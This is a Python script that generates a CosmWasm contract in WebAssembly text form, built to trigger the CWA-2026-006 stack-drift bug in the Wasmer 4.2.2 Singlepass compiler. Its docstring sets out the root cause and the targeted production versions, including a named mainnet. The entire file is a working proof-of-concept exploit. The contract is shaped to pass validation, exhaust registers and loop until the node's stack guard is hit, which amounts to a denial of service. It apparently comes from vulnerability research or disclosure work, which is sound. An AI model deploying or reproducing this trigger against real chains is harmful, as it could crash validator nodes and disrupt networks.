#!/usr/bin/env python3
"""Generate the CWA-2026-006 (Hexens WASMageddon) CosmWasm trigger contract.

Shape (derived from wasmer-compiler-singlepass 4.2.2 codegen.rs):

    loop {
        N live computed i64 values        ;; exhaust the 6 allocatable GPRs
        i32.load (true)                   ;; take the THEN branch
        if (result i64) { computed } else { computed }
        drop; drop xN                     ;; release spill slots
        call env.db_read(valid region)    ;; host-import call per iteration
    }
    respond {"ok": ...}

Root cause: at the `Operator::Else` transition, `release_locations_value()`
releases the memory-backed then-result and then calls `adjust_stack` (sub rsp)
instead of `restore_stack` (add rsp) -> native stack drifts downward every
iteration (~16 bytes) until the fiber stack guard is hit.

This module is a valid CosmWasm contract: required exports
(`allocate`, `deallocate`, `instantiate`, `interface_version_8`), one exported
memory named "memory", and the real host import `env.db_read` (Gatekeeper and
Metering compatible), so it can be exercised through stock wasmvm 1.5.5
(Archway mainnet: wasmvm v1.5.5 / Wasmer 4.2.2 Singlepass).

Usage: python3 gen.py [out.wat]
"""

import struct
import sys

RESP = b'{"ok":{"messages":[],"data":null,"attributes":[],"events":[]}}'
LIVE = 16          # live computed i64 values (lab: >=6 exhausts the GPR pool)
ITERS = 300_000    # > 65508 (1 MiB / 16 B) with margin; also covers 8 B drift
COND_ADDR = 0      # nonzero i32 -> then branch (whose tail carries the bug)
KEYREG_ADDR = 16   # Region {offset=48, capacity=1, length=1}
RESPREG_ADDR = 32  # Region {offset=256, capacity=64, length=len(RESP)}
KEY_ADDR = 48      # one key byte
RESP_ADDR = 256


def escaped(b: bytes) -> str:
    return "".join("\\%02x" % x for x in b)


def data(addr: int, payload: bytes) -> str:
    return f'  (data (i32.const {addr}) "{escaped(payload)}")'


def region(offset: int, capacity: int, length: int) -> bytes:
    return struct.pack("<III", offset, capacity, length)


def main() -> None:
    out = sys.argv[1] if len(sys.argv) > 1 else "p1drift.wat"
    iters = int(sys.argv[2]) if len(sys.argv) > 2 else ITERS
    assert len(RESP) <= 64, len(RESP)

    live = ["        (i64.extend_i32_u (local.get $i))"] * LIVE
    drops = ["        " + " ".join(["drop"] * LIVE)]

    lines = [
        ";; CWA-2026-006 trigger - CosmWasm ABI contract (generated by gen.py).",
        ";; Do not hand-edit; edit gen.py and regenerate.",
        "(module",
        '  (import "env" "db_read" (func $db_read (param i32) (result i32)))',
        '  (memory (export "memory") 1)',
        "  (global $heap (mut i32) (i32.const 8192))",
        "",
        "  ;; bump allocator: returns a pointer to a Region{offset,capacity,length}",
        '  (func (export "allocate") (param $size i32) (result i32)',
        "    (local $data i32)",
        "    (local $region i32)",
        "    (local.set $data (global.get $heap))",
        "    (global.set $heap",
        "      (i32.and",
        "        (i32.add (i32.add (local.get $data) (local.get $size)) (i32.const 7))",
        "        (i32.const -8)))",
        "    (local.set $region (global.get $heap))",
        "    (global.set $heap (i32.add (global.get $heap) (i32.const 16)))",
        "    (i32.store (local.get $region) (local.get $data))",
        "    (i32.store offset=4 (local.get $region) (local.get $size))",
        "    (i32.store offset=8 (local.get $region) (i32.const 0))",
        "    (local.get $region))",
        "",
        '  (func (export "deallocate") (param $ptr i32))',
        '  (func (export "interface_version_8"))',
        "",
        "  ;; static regions + data",
        data(COND_ADDR, b"\x01\x00\x00\x00"),
        data(KEYREG_ADDR, region(KEY_ADDR, 1, 1)),
        data(RESPREG_ADDR, region(RESP_ADDR, 64, len(RESP))),
        data(KEY_ADDR, b"\x00"),
        data(RESP_ADDR, RESP),
        "",
        "  (func $respond (result i32) (i32.const 32))",
        "",
        '  (func (export "instantiate") (param i32 i32 i32) (result i32)',
        "    (call $respond))",
        "",
        '  (func (export "execute") (param i32 i32 i32) (result i32)',
        "    (local $i i32)",
        "    (block $exit",
        "      (loop $l",
        "        ;; live computed values -> register pressure",
        *live,
        "        ;; condition (nonzero) -> then branch",
        "        (i32.load (i32.const 0))",
        "        ;; result-bearing if; the then-result is memory-backed",
        "        (if (result i64)",
        "          (then",
        "            (i64.add (i64.extend_i32_u (local.get $i)) (i64.const 0x12345678)))",
        "          (else",
        "            (i64.extend_i32_u (local.get $i))))",
        "        drop",
        "        ;; release the live values",
        *drops,
        "        ;; host-import call (real CosmWasm import, valid 1-byte key)",
        "        (call $db_read (i32.const 16))",
        "        drop",
        "        ;; loop control",
        "        (local.set $i (i32.add (local.get $i) (i32.const 1)))",
        f"        (br_if $l (i32.lt_u (local.get $i) (i32.const {iters})))",
        "      )",
        "    )",
        "    (call $respond))",
        ")",
        "",
    ]

    with open(out, "w") as f:
        f.write("\n".join(lines))
    print(f"wrote {out}: live={LIVE} iters={ITERS} resp_len={len(RESP)}")


if __name__ == "__main__":
    main()
